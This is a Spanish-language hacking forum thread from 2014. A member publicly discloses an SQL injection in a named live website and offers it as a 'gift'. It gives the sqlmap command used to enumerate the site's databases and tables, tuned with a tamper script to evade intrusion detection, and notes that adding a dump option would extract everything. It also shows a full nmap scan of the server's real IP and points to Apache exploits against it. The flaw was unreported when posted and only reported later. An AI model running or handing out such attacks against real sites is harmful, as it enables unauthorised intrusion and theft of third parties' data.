[SQL INJECTION] http://www.idocz.net/Login.php?id='

Iniciado por charly837, Mayo 08, 2014, 12:24:37 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 08, 2014, 12:24:37 PM Ultima modificación: Mayo 08, 2014, 12:27:05 PM por charly837
Hola a todos , nose si es mi primer post , espero que no, en caso de ser asi, me doy por presentado, y os traigo un regalito:

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'



Utilice Sqlmap para explotar la vulnerabilidad, acontinuacion pongo los parametro usados para listar las bases de datos y las tablas

C:\sqlmap>sqlmap.py -u "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" --dbs --dbms=MySQL --ignore-proxy --tamper "space2morehash"  -D idocz_web --tables



utilice la opcion tamper y ignore-proxy porque en el lugar que lo estoy haciendo hay ids , ips y me bloqueba los ataques (No seria necesario), en caso de querer hacer un dumpeado , bastaria con la opcion --dump-all alfinal.

me interese un poco en la version de apache que tiene el servidor que es la  Apache 2.2.14 y encontre muchos exploits, os expongo la url de uno de ellos que me parecio interesante , esto no lo he podido probar ya que no dispongo de linux en este momento.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y la lista completa para esa version de apache 2.2.14 es:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

nose si serva vulnerable a todos pero alguno seguro!!

He intentado ser todo lo explicito que he podido, nose si demasiado, o demasiado poco , en cualquier caso , que los moderadores me digan!

la vulnerabilidad no ha sido reportada.

Espero que os haya resultado interesantem o por lo menos tan interesante como ami hacerlo  :D :D :D :D, gracias a todos por este foro!


Muy bueno bro! Le reportaste el fallo al webmaster?

Saludos!
ANTRAX


No, todavia no se lo he reportado, acabo de editar el post poniendo eso precisamente  :D :D :D :D

Espero que lo reparen antes de que algun lammer lo explote.
Muy buen trabajo bro!

Saludos!
ANTRAX


Si puedes añadir una captura del reporte estaría genial. Por cierto, no creo que se deban mostrar las tablas (información sensible), con una breve prueba de concepto sobra, saludos.
Contacto: @migueljimeno96 -

Os pongo el reporte del nmap que resulta bastante interesante, direis porque usa los parametros -O y -A al mismo tiemop pues nose tengo manias...  ;D ;D ;D ;D ;D

Código: php

[*] exec: nmap -sS -PN -O 184.71.243.98 -A -sC


Starting Nmap 6.40 ( http://nmap.org ) at 2014-05-08 15:35 EDT
Nmap scan report for 184.71.243.98
Host is up (0.23s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Home
443/tcp open  ssl/http Apache httpd 2.2.14
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title (text/plain).
| ssl-cert: Subject: commonName=*.idocz.net
| Not valid before: 2014-02-26T13:59:42+00:00
|_Not valid after:  2015-04-02T02:26:31+00:00
|_ssl-date: 2014-05-08T17:27:37+00:00; -2h09m16s from local time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.32 - 2.6.33 (87%), Linux 2.6.32 - 2.6.35 (87%), Linux 2.6.31 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: Host: pass.idocz.net

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   3.70 ms   192.168.0.1
2   11.03 ms  10.219.32.1
3   13.43 ms  10.127.44.125
4   22.75 ms  10.207.243.53
5   12.49 ms  10.254.5.110
6   13.74 ms  mad-b2-link.telia.net (80.239.160.81)
7   118.82 ms prs-bb2-link.telia.net (80.91.245.60)
8   145.40 ms nyk-bb1-link.telia.net (80.91.253.122)
9   140.56 ms chi-bb1-link.telia.net (213.155.136.19)
10  138.85 ms shawbusiness-ic-300305-chi-eqx-i1.c.telia.net (62.115.12.90)
11  148.43 ms rc2nr-hge0-9-0-0.wp.shawcable.net (66.163.77.201)
12  172.47 ms rc3no-tge0-11-0-11.cg.shawcable.net (66.163.64.173)
13  189.71 ms dx2dt-te3.cg.shawcable.net (64.59.132.158)
14  224.01 ms 184.71.243.98

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.28 seconds

Ya he reportado la vulnerabilidad a la pagina web a traves de su correo de contacto, Ya en sus manos queda...